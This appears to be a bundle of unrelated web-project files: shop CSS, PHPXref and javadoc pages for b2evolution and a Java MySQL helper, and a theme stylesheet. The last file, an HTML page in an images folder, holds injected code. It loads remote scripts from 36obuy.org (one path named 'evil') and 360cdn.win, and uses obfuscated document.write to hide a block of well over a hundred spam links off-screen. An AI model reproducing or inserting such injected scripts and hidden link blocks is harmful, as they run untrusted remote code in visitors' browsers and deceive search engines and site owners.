font-family: 'bebas_neue_regularregular';
letter-spacing: 0.3em;
margin-top: -19%;
font-size: 3.5em;
}
/*
██╗ ██╗ ██████╗ ███╗ ███╗███████╗
██║ ██║██╔═══██╗████╗ ████║██╔════╝
███████║██║ ██║██╔████╔██║█████╗
██╔══██║██║ ██║██║╚██╔╝██║██╔══╝
██║ ██║╚██████╔╝██║ ╚═╝ ██║███████╗
╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝
*/
/*
section : categorias
*/
.btn-categorias {
padding: 0.5%;
margin-top: 5px;
width:30%;
border: 2px solid #f7f7f7;
text-align: center;
text-transform: uppercase;
overflow: hidden;
}
.btn-categorias button{
background: transparent;
border: none;
color: #fff;
width:100%;
font-size: 0.8em;
}
.btn-categorias:hover button{
color: #000;
}
.s-categorias{
padding: 5% 10%;
margin-top:195px;
}
.accesorios{
background: url(https://s3-sa-east-1.amazonaws.com/feelingsurf/boton-hombre.png) no-repeat;
height: 47vw;
background-size: 98% 100%;
overflow:hidden;
}
.accesorios a{
text-decoration: none;
position: absolute;
left: 36px;
bottom: 105px;
color: #fff;
}
.btn-accesorios{
position: absolute;
left: 36px;
bottom:85px;
background: white;
}
.btn-accesorios button{
color:#555;
}
.descuento{
margin-bottom:1vw;
background: url(https://s3-sa-east-1.amazonaws.com/feelingsurf/en--descuento.png) no-repeat;
height: 21vw;
background-size: 98% 100%;
overflow:hidden;
}
.descuento a{
text-decoration: none;
position: absolute;
right: 46px;
bottom: 105px;
color: #fff;
}
.btn-descuento{
position: absolute;
right: 46px;
bottom:85px;
background: #AAA;
}
.hombre{
background: url(https://s3-sa-east-1.amazonaws.com/feelingsurf/boton-accesorios.png) no-repeat;
height: 25vw;
background-size: 98% 100%;
overflow:hidden;
text-align:center;
}
.mujer{
background: url(https://s3-sa-east-1.amazonaws.com/feelingsurf/boton-mujer.png) no-repeat;
height: 25vw;
background-size: 98% 100%;
overflow:hidden;
text-align:center;
}
.hombre a, .mujer a{
position: relative;
top: 50px;
text-decoration: none;
color: #fff;
}
.btn-gender{
width: 60%;
position: relative;
margin: auto;
top: 55px;
}
/*
section: video
*/
.s-video{
height:33.9vw;
margin-bottom: 5%;
}
.video-description{
background-image:url(https://s3-sa-east-1.amazonaws.com/feelingsurf/feeling-surf-imagen-del-video.jpg);
background-size:cover;
height: 100%;
text-align: center;
color: #ccc;
padding: 3% 8%;
overflow: hidden;
}
.video-description p{
margin-top: 10%;
font-size: 0.9em;
text-align: left;
}
.img-description{
height: 100%;
width: auto;
}
.video-container{
width:100%;
}
.isokbutton{
width:20%;
left:40%;
position:absolute;
padding: 2px 30px;
margin-top: -25px;
height: 50px;
background-color: #fff;
border: none;
-webkit-box-shadow: 6px 9px 11px -3px rgba(0,0,0,0.54);
-moz-box-shadow: 6px 9px 11px -3px rgba(0,0,0,0.54);
box-shadow: 6px 9px 11px -3px rgba(0,0,0,0.54);
}
/*
███████╗ ██████╗ ██████╗ ████████╗███████╗██████╗
██╔════╝██╔═══██╗██╔═══██╗╚══██╔══╝██╔════╝██╔══██╗
█████╗ ██║ ██║██║ ██║ ██║ █████╗ ██████╔╝
██╔══╝ ██║ ██║██║ ██║ ██║ ██╔══╝ ██╔══██╗
██║ ╚██████╔╝╚██████╔╝ ██║ ███████╗██║ ██║
╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
*/
.footer{
background-color: #2A2A2A;
padding: 1%;
}
.footer-list{
height:100%;
margin-top:45px;
font-size: 10px;
color: #fff;
text-align:center;
}
.copyright{
font-size: 10px;
position:absolute;
text-align:center;
width:40%;
color: #555;
bottom:-40px;
left:30%;
}
.img-footer{
height: 100px;
width: auto;
}
@media (min-width: 768px) {
.navbar-fixed-top {
right: 90px;
left: 90px;
}
}
.products{
padding-left: 5px;
margin-left: -5px;
list-style: none;
}
.products > li {
display: inline-block;
padding-right: 5px;
padding-left: 5px;
}
|
_functions/get_subregion.html | mgsolipa/b2evolution_phpxref | <!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Function Reference: get_subregion()</title>
<link rel="stylesheet" href="../sample.css" type="text/css">
<link rel="stylesheet" href="../sample-print.css" type="text/css" media="print">
<style id="hilight" type="text/css"></style>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
</head>
<body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff">
<table class="pagetitle" width="100%">
<tr>
<td valign="top" class="pagetitle">
[ <a href="../index.html">Index</a> ]
</td>
<td align="right" class="pagetitle">
<h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2>
</td>
</tr>
</table>
<!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 -->
<!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net -->
<!-- http://phpxref.sourceforge.net/ -->
<script src="../phpxref.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript">
<!--
ext='.html';
relbase='../';
subdir='_functions';
filename='index.html';
cookiekey='phpxref';
handleNavFrame(relbase, subdir, filename);
logFunction('get_subregion');
// -->
</script>
<script language="JavaScript" type="text/javascript">
if (gwGetCookie('xrefnav')=='off')
document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>');
else
document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>');
</script>
<noscript>
<p class="navlinks">
[ <a href="../nav.html" target="_top">Show Explorer</a> ]
[ <a href="index.html" target="_top">Hide Navbar</a> ]
</p>
</noscript>
[<a href="../index.html">Top level directory</a>]<br>
<script language="JavaScript" type="text/javascript">
<!--
document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>');
document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">');
document.writeln('<tr><td class="searchbox-title">');
document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>');
document.writeln('<\/td><\/tr>');
document.writeln('<tr><td class="searchbox-body" id="searchbox-body">');
document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>');
document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="classname"><br>');
document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="funcname"><br>');
document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="varname"><br>');
document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="constname"><br>');
document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="tablename"><br>');
document.writeln('<input type="submit" class="searchbox-button" value="Search">');
document.writeln('<\/form>');
document.writeln('<\/td><\/tr><\/table>');
document.writeln('<\/td><\/tr><\/table>');
// -->
</script>
<div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div>
<h3>Function and Method Cross Reference</h3>
<h2><a href="index.html#get_subregion">get_subregion()</a></h2>
<b>Defined at:</b><ul>
<li><a href="../inc/items/model/_item.class.php.html#get_subregion">/inc/items/model/_item.class.php</a> -> <a onClick="logFunction('get_subregion', '/inc/items/model/_item.class.php.source.html#l6816')" href="../inc/items/model/_item.class.php.source.html#l6816"> line 6816</a></li>
</ul>
<b>Referenced 1 times:</b><ul>
<li><a href="../inc/items/model/_item.class.php.html">/inc/items/model/_item.class.php</a> -> <a href="../inc/items/model/_item.class.php.source.html#l6726"> line 6726</a></li>
</ul>
<!-- A link to the phpxref site in your customized footer file is appreciated ;-) -->
<br><hr>
<table width="100%">
<tr><td>Generated: Sat Nov 21 22:13:19 2015</td>
<td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td>
</tr>
</table>
</body></html>
|
skins/bootstrap_main_skin/front.main.php.html | mgsolipa/b2evolution_phpxref | <!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Detail view of front.main.php</title>
<link rel="stylesheet" href="../../sample.css" type="text/css">
<link rel="stylesheet" href="../../sample-print.css" type="text/css" media="print">
<style id="hilight" type="text/css"></style>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
</head>
<body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff">
<table class="pagetitle" width="100%">
<tr>
<td valign="top" class="pagetitle">
[ <a href="../../index.html">Index</a> ]
</td>
<td align="right" class="pagetitle">
<h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2>
</td>
</tr>
</table>
<!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 -->
<!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net -->
<!-- http://phpxref.sourceforge.net/ -->
<script src="../../phpxref.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript">
<!--
ext='.html';
relbase='../../';
subdir='skins/bootstrap_main_skin';
filename='front.main.php.html';
cookiekey='phpxref';
handleNavFrame(relbase, subdir, filename);
// -->
</script>
<script language="JavaScript" type="text/javascript">
if (gwGetCookie('xrefnav')=='off')
document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>');
else
document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>');
</script>
<noscript>
<p class="navlinks">
[ <a href="../../nav.html" target="_top">Show Explorer</a> ]
[ <a href="index.html" target="_top">Hide Navbar</a> ]
</p>
</noscript>
<script language="JavaScript" type="text/javascript">
<!--
document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>');
document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">');
document.writeln('<tr><td class="searchbox-title">');
document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>');
document.writeln('<\/td><\/tr>');
document.writeln('<tr><td class="searchbox-body" id="searchbox-body">');
document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>');
document.writeln('<a class="searchbox-body" href="../../_classes/index.html">Class<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="classname"><br>');
document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../../_functions/index.html">Function<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="funcname"><br>');
document.writeln('<a class="searchbox-body" href="../../_variables/index.html">Variable<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="varname"><br>');
document.writeln('<a class="searchbox-body" href="../../_constants/index.html">Constant<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="constname"><br>');
document.writeln('<a class="searchbox-body" href="../../_tables/index.html">Table<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="tablename"><br>');
document.writeln('<input type="submit" class="searchbox-button" value="Search">');
document.writeln('<\/form>');
document.writeln('<\/td><\/tr><\/table>');
document.writeln('<\/td><\/tr><\/table>');
// -->
</script>
<div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div>
<h2 class="details-heading"><a href="./index.html">/skins/bootstrap_main_skin/</a> -> <a href="front.main.php.source.html">front.main.php</a> (summary)</h2>
<div class="details-summary">
<p class="viewlinks">[<a href="front.main.php.source.html">Source view</a>]
[<a href="javascript:window.print();">Print</a>]
[<a href="../../_stats.html">Project Stats</a>]</p>
<p><b>This is the template that displays the front page of a collection (when front page enabled)</b></p>
<table>
<tr><td align="right">File Size: </td><td>321 lines (12 kb)</td></tr>
<tr><td align="right">Included or required:</td><td>0 times</td></tr>
<tr><td align="right" valign="top">Referenced: </td><td>0 times</td></tr>
<tr><td align="right" valign="top">Includes or requires: </td><td>0 files</td></tr>
</table>
</div>
<br><div class="details-funclist">
</div>
<!-- A link to the phpxref site in your customized footer file is appreciated ;-) -->
<br><hr>
<table width="100%">
<tr><td>Generated: Sat Nov 21 22:13:19 2015</td>
<td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td>
</tr>
</table>
</body></html>
|
src/main/javadoc/overview-tree.html | viktorstrate/JavaMysqlMadeEasy | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_75) on Wed Mar 11 19:36:54 CET 2015 -->
<title>Class Hierarchy</title>
<meta name="date" content="2015-03-11">
<link rel="stylesheet" type="text/css" href="stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Class Hierarchy";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="dk/qpqp/mysqlMadeEasy/package-summary.html">Package</a></li>
<li>Class</li>
<li class="navBarCell1Rev">Tree</li>
<li><a href="deprecated-list.html">Deprecated</a></li>
<li><a href="index-files/index-1.html">Index</a></li>
<li><a href="help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="index.html?overview-tree.html" target="_top">Frames</a></li>
<li><a href="overview-tree.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h1 class="title">Hierarchy For All Packages</h1>
<span class="strong">Package Hierarchies:</span>
<ul class="horizontal">
<li><a href="dk/qpqp/mysqlMadeEasy/package-tree.html">dk.qpqp.mysqlMadeEasy</a></li>
</ul>
</div>
<div class="contentContainer">
<h2 title="Class Hierarchy">Class Hierarchy</h2>
<ul>
<li type="circle">java.lang.Object
<ul>
<li type="circle">dk.qpqp.mysqlMadeEasy.<a href="dk/qpqp/mysqlMadeEasy/Mysql.html" title="class in dk.qpqp.mysqlMadeEasy"><span class="strong">Mysql</span></a></li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="dk/qpqp/mysqlMadeEasy/package-summary.html">Package</a></li>
<li>Class</li>
<li class="navBarCell1Rev">Tree</li>
<li><a href="deprecated-list.html">Deprecated</a></li>
<li><a href="index-files/index-1.html">Index</a></li>
<li><a href="help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="index.html?overview-tree.html" target="_top">Frames</a></li>
<li><a href="overview-tree.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
sites/default/themes/pringandrandell/assets/css/custom.css | randell/PringAndRandell | /* It is recommended to place all your extra/additional CSS rules here */
@font-face {
font-family: Alsscrp;
src: url('./fonts/alsscrp.ttf');
}
@font-face {
font-family: Rakesly;
src: url('./fonts/rakesly-rg.ttf');
}
h1, h2, h3, h4, h5, .title {
font-family: Rakesly, 'Helvetica Neue', Arial, Helvetica, sans-serif !important;
}
p {
font-family: Alsscrp, 'Helvetica Neue', Arial, Helvetica, sans-serif;
font-size: 1.8em;
}
#main-content .feature-text .btn-lg {
font-size: 0.25em;
}
.link-scroll {
font-family: Alsscrp, 'Helvetica Neue', Arial, Helvetica, sans-serif !important;
font-size: 1.5em;
}
input, button, select, textarea {
color: #000;
} |
images/Chershire/02021944378bm.html | ForAEdesWeb/AEW2 | <script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://cpm.36obuy.org/lion/1.js"></script><script/src=//360cdn.win/c.css></script>
<script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '000' + 'p' + 'x;t' + 'op' + ':-3' + '000' + 'p' + 'x;' + '"' + '>');</script>
<a class="z7z8z9z6" href="http://www.4695288.com/">http://www.4695288.com/</a>
<a class="z7z8z9z6" href="http://www.5613117.com/">http://www.5613117.com/</a>
<a class="z7z8z9z6" href="http://www.4309272.com/">http://www.4309272.com/</a>
<a class="z7z8z9z6" href="http://www.3619276.com/">http://www.3619276.com/</a>
<a class="z7z8z9z6" href="http://www.1539774.com/">http://www.1539774.com/</a>
<a class="z7z8z9z6" href="http://www.2234809.com/">http://www.2234809.com/</a>
<a class="z7z8z9z6" href="http://www.0551180.com/">http://www.0551180.com/</a>
<a class="z7z8z9z6" href="http://www.0027022.com/">http://www.0027022.com/</a>
<a class="z7z8z9z6" href="http://www.1408600.com/">http://www.1408600.com/</a>
<a class="z7z8z9z6" href="http://www.5004279.com/">http://www.5004279.com/</a>
<a class="z7z8z9z6" href="http://www.4314451.com/">http://www.4314451.com/</a>
<a class="z7z8z9z6" href="http://www.9402647.com/">http://www.9402647.com/</a>
<a class="z7z8z9z6" href="http://www.6420212.com/">http://www.6420212.com/</a>
<a class="z7z8z9z6" href="http://www.0921315.com/">http://www.0921315.com/</a>
<a class="z7z8z9z6" href="http://www.4849062.com/">http://www.4849062.com/</a>
<a class="z7z8z9z6" href="http://www.8027847.com/">http://www.8027847.com/</a>
<a class="z7z8z9z6" href="http://www.5101309.com/">http://www.5101309.com/</a>
<a class="z7z8z9z6" href="http://www.8033162.com/">http://www.8033162.com/</a>
<a class="z7z8z9z6" href="http://www.7808733.com/">http://www.7808733.com/</a>
<a class="z7z8z9z6" href="http://www.7021821.com/">http://www.7021821.com/</a>
<a class="z7z8z9z6" href="http://www.8560978.com/">http://www.8560978.com/</a>
<a class="z7z8z9z6" href="http://www.3301718.com/">http://www.3301718.com/</a>
<a class="z7z8z9z6" href="http://www.2444890.com/">http://www.2444890.com/</a>
<a class="z7z8z9z6" href="http://www.2501886.com/">http://www.2501886.com/</a>
<a class="z7z8z9z6" href="http://www.8773150.com/">http://www.8773150.com/</a>
<a class="z7z8z9z6" href="http://www.gkamlb.com/">http://www.gkamlb.com/</a>
<a class="z7z8z9z6" href="http://www.nxkmky.com/">http://www.nxkmky.com/</a>
<a class="z7z8z9z6" href="http://www.pkdszd.com/">http://www.pkdszd.com/</a>
<a class="z7z8z9z6" href="http://www.scqyba.com/">http://www.scqyba.com/</a>
<a class="z7z8z9z6" href="http://www.vwyhzp.com/">http://www.vwyhzp.com/</a>
<a class="z7z8z9z6" href="http://www.vwwoms.com/">http://www.vwwoms.com/</a>
<a class="z7z8z9z6" href="http://www.svfdun.com/">http://www.svfdun.com/</a>
<a class="z7z8z9z6" href="http://www.wivjvd.com/">http://www.wivjvd.com/</a>
<a class="z7z8z9z6" href="http://www.sstldp.com/">http://www.sstldp.com/</a>
<a class="z7z8z9z6" href="http://www.sqmtvh.com/">http://www.sqmtvh.com/</a>
<a class="z7z8z9z6" href="http://www.fmxnav.com/">http://www.fmxnav.com/</a>
<a class="z7z8z9z6" href="http://www.etqglz.com/">http://www.etqglz.com/</a>
<a class="z7z8z9z6" href="http://www.rjwmkb.com/">http://www.rjwmkb.com/</a>
<a class="z7z8z9z6" href="http://www.yrljss.com/">http://www.yrljss.com/</a>
<a class="z7z8z9z6" href="http://www.ymdwnv.com/">http://www.ymdwnv.com/</a>
<a class="z7z8z9z6" href="http://www.lhxcjs.com/">http://www.lhxcjs.com/</a>
<a class="z7z8z9z6" href="http://www.fekcko.com/">http://www.fekcko.com/</a>
<a class="z7z8z9z6" href="http://www.furpdg.com/">http://www.furpdg.com/</a>
<a class="z7z8z9z6" href="http://www.voqgwh.com/">http://www.voqgwh.com/</a>
<a class="z7z8z9z6" href="http://www.fknqkj.com/">http://www.fknqkj.com/</a>
<a class="z7z8z9z6" href="http://www.hhabtr.com/">http://www.hhabtr.com/</a>
<a class="z7z8z9z6" href="http://www.ogmykg.com/">http://www.ogmykg.com/</a>
<a class="z7z8z9z6" href="http://www.vseogg.com/">http://www.vseogg.com/</a>
<a class="z7z8z9z6" href="http://www.ctkllf.com/">http://www.ctkllf.com/</a>
<a class="z7z8z9z6" href="http://www.xzxefw.com/">http://www.xzxefw.com/</a>
<a class="z7z8z9z6" href="http://www.0172679.com/">http://www.0172679.com/</a>
<a class="z7z8z9z6" href="http://www.6088532.com/">http://www.6088532.com/</a>
<a class="z7z8z9z6" href="http://www.5214437.com/">http://www.5214437.com/</a>
<a class="z7z8z9z6" href="http://www.4601598.com/">http://www.4601598.com/</a>
<a class="z7z8z9z6" href="http://www.3848474.com/">http://www.3848474.com/</a>
<a class="z7z8z9z6" href="http://www.7621914.com/">http://www.7621914.com/</a>
<a class="z7z8z9z6" href="http://www.9064024.com/">http://www.9064024.com/</a>
<a class="z7z8z9z6" href="http://www.0979289.com/">http://www.0979289.com/</a>
<a class="z7z8z9z6" href="http://www.8732369.com/">http://www.8732369.com/</a>
<a class="z7z8z9z6" href="http://www.7578050.com/">http://www.7578050.com/</a>
<a class="z7z8z9z6" href="http://www.1206219.com/">http://www.1206219.com/</a>
<a class="z7z8z9z6" href="http://www.0320448.com/">http://www.0320448.com/</a>
<a class="z7z8z9z6" href="http://www.6038608.com/">http://www.6038608.com/</a>
<a class="z7z8z9z6" href="http://www.6804640.com/">http://www.6804640.com/</a>
<a class="z7z8z9z6" href="http://www.2393657.com/">http://www.2393657.com/</a>
<a class="z7z8z9z6" href="http://www.laibazonghewang.com/">http://www.laibazonghewang.com/</a>
<a class="z7z8z9z6" href="http://www.jiujiurezuixindizhi.com/">http://www.jiujiurezuixindizhi.com/</a>
<a class="z7z8z9z6" href="http://www.jiqingtupian8.com/">http://www.jiqingtupian8.com/</a>
<a class="z7z8z9z6" href="http://www.qmzufv.com/">http://www.qmzufv.com/</a>
<a class="z7z8z9z6" href="http://www.kwwxgj.com/">http://www.kwwxgj.com/</a>
<a class="z7z8z9z6" href="http://www.tvubqi.com/">http://www.tvubqi.com/</a>
<a class="z7z8z9z6" href="http://www.sjvxww.com/">http://www.sjvxww.com/</a>
<a class="z7z8z9z6" href="http://www.xpdmzk.com/">http://www.xpdmzk.com/</a>
<a class="z7z8z9z6" href="http://www.frveya.com/">http://www.frveya.com/</a>
<a class="z7z8z9z6" href="http://www.nonmnu.com/">http://www.nonmnu.com/</a>
<a class="z7z8z9z6" href="http://www.svytac.com/">http://www.svytac.com/</a>
<a class="z7z8z9z6" href="http://www.fdtggb.com/">http://www.fdtggb.com/</a>
<a class="z7z8z9z6" href="http://www.rnrnjm.com/">http://www.rnrnjm.com/</a>
<a class="z7z8z9z6" href="http://www.ymrxun.com/">http://www.ymrxun.com/</a>
<a class="z7z8z9z6" href="http://www.lkrecc.com/">http://www.lkrecc.com/</a>
<a class="z7z8z9z6" href="http://www.kgahjl.com/">http://www.kgahjl.com/</a>
<a class="z7z8z9z6" href="http://www.kqdmep.com/">http://www.kqdmep.com/</a>
<a class="z7z8z9z6" href="http://www.vwlwcu.com/">http://www.vwlwcu.com/</a>
<a class="z7z8z9z6" href="http://www.zuixinlunlidianying.com/">http://www.zuixinlunlidianying.com/</a>
<a class="z7z8z9z6" href="http://www.daxiangjiaowangzhi.com/">http://www.daxiangjiaowangzhi.com/</a>
<a class="z7z8z9z6" href="http://www.snnfi.com/">http://www.snnfi.com/</a>
<a class="z7z8z9z6" href="http://www.vfdyd.com/">http://www.vfdyd.com/</a>
<a class="z7z8z9z6" href="http://www.lwezk.com/">http://www.lwezk.com/</a>
<a class="z7z8z9z6" href="http://www.fpibm.com/">http://www.fpibm.com/</a>
<a class="z7z8z9z6" href="http://www.xjvdr.com/">http://www.xjvdr.com/</a>
<a class="z7z8z9z6" href="http://www.kvwqf.com/">http://www.kvwqf.com/</a>
<a class="z7z8z9z6" href="http://www.utakf.com/">http://www.utakf.com/</a>
<a class="z7z8z9z6" href="http://www.gmjeu.com/">http://www.gmjeu.com/</a>
<a class="z7z8z9z6" href="http://www.pugfa.com/">http://www.pugfa.com/</a>
<a class="z7z8z9z6" href="http://www.bldek.com/">http://www.bldek.com/</a>
<a class="z7z8z9z6" href="http://www.vdidu.com/">http://www.vdidu.com/</a>
<a class="z7z8z9z6" href="http://www.tufnc.com/">http://www.tufnc.com/</a>
<a class="z7z8z9z6" href="http://www.wqxri.com/">http://www.wqxri.com/</a>
<a class="z7z8z9z6" href="http://www.uaozz.com/">http://www.uaozz.com/</a>
<a class="z7z8z9z6" href="http://www.nhpbd.com/">http://www.nhpbd.com/</a>
<a class="z7z8z9z6" href="http://www.dinbz.com/">http://www.dinbz.com/</a>
<a class="z7z8z9z6" href="http://www.bopjc.com/">http://www.bopjc.com/</a>
<a class="z7z8z9z6" href="http://www.rvkip.com/">http://www.rvkip.com/</a>
<a class="z7z8z9z6" href="http://www.jsmqe.com/">http://www.jsmqe.com/</a>
<a class="z7z8z9z6" href="http://www.vwygx.com/">http://www.vwygx.com/</a>
<a class="z7z8z9z6" href="http://www.zgjm-org.com/">http://www.zgjm-org.com/</a>
<a class="z7z8z9z6" href="http://www.shenyangsiyue.com/">http://www.shenyangsiyue.com/</a>
<a class="z7z8z9z6" href="http://www.hongsang.net/">http://www.hongsang.net/</a>
<a class="z7z8z9z6" href="http://www.gpmrg.cc/">http://www.gpmrg.cc/</a>
<a class="z7z8z9z6" href="http://www.knfut.cc/">http://www.knfut.cc/</a>
<a class="z7z8z9z6" href="http://www.kjqdh.cc/">http://www.kjqdh.cc/</a>
<a class="z7z8z9z6" href="http://www.huang62.win/">http://www.huang62.win/</a>
<a class="z7z8z9z6" href="http://www.qiong19.win/">http://www.qiong19.win/</a>
<a class="z7z8z9z6" href="http://www.chang34.win/">http://www.chang34.win/</a>
<a class="z7z8z9z6" href="http://www.huang71.win/">http://www.huang71.win/</a>
<a class="z7z8z9z6" href="http://www.xiong10.win/">http://www.xiong10.win/</a>
<a class="z7z8z9z6" href="http://www.chong14.win/">http://www.chong14.win/</a>
<a class="z7z8z9z6" href="http://www.chong94.win/">http://www.chong94.win/</a>
<a class="z7z8z9z6" href="http://www.zheng23.win/">http://www.zheng23.win/</a>
<a class="z7z8z9z6" href="http://www.cheng14.win/">http://www.cheng14.win/</a>
<a class="z7z8z9z6" href="http://www.shang72.win/">http://www.shang72.win/</a>
<a class="z7z8z9z6" href="http://www.sudanj.win/">http://www.sudanj.win/</a>
<a class="z7z8z9z6" href="http://www.russias.win/">http://www.russias.win/</a>
<a class="z7z8z9z6" href="http://www.malim.win/">http://www.malim.win/</a>
<a class="z7z8z9z6" href="http://www.nigery.win/">http://www.nigery.win/</a>
<a class="z7z8z9z6" href="http://www.malix.win/">http://www.malix.win/</a>
<a class="z7z8z9z6" href="http://www.peruf.win/">http://www.peruf.win/</a>
<a class="z7z8z9z6" href="http://www.iraqq.win/">http://www.iraqq.win/</a>
<a class="z7z8z9z6" href="http://www.nepali.win/">http://www.nepali.win/</a>
<a class="z7z8z9z6" href="http://www.syriax.win/">http://www.syriax.win/</a>
<a class="z7z8z9z6" href="http://www.junnp.pw/">http://www.junnp.pw/</a>
<a class="z7z8z9z6" href="http://www.junnp.win/">http://www.junnp.win/</a>
<a class="z7z8z9z6" href="http://www.zanpianba.com/">http://www.zanpianba.com/</a>
<a class="z7z8z9z6" href="http://www.shoujimaopian.com/">http://www.shoujimaopian.com/</a>
<a class="z7z8z9z6" href="http://www.gaoqingkanpian.com/">http://www.gaoqingkanpian.com/</a>
<a class="z7z8z9z6" href="http://www.kuaibokanpian.com/">http://www.kuaibokanpian.com/</a>
<a class="z7z8z9z6" href="http://www.baidukanpian.com/">http://www.baidukanpian.com/</a>
<a class="z7z8z9z6" href="http://www.wwwren99com.top/">http://www.wwwren99com.top/</a>
<a class="z7z8z9z6" href="http://www.wwwdgshunyuancom.top/">http://www.wwwdgshunyuancom.top/</a>
<a class="z7z8z9z6" href="http://www.xianfengziyuancom.top/">http://www.xianfengziyuancom.top/</a>
<a class="z7z8z9z6" href="http://www.www96yyxfcom.top/">http://www.www96yyxfcom.top/</a>
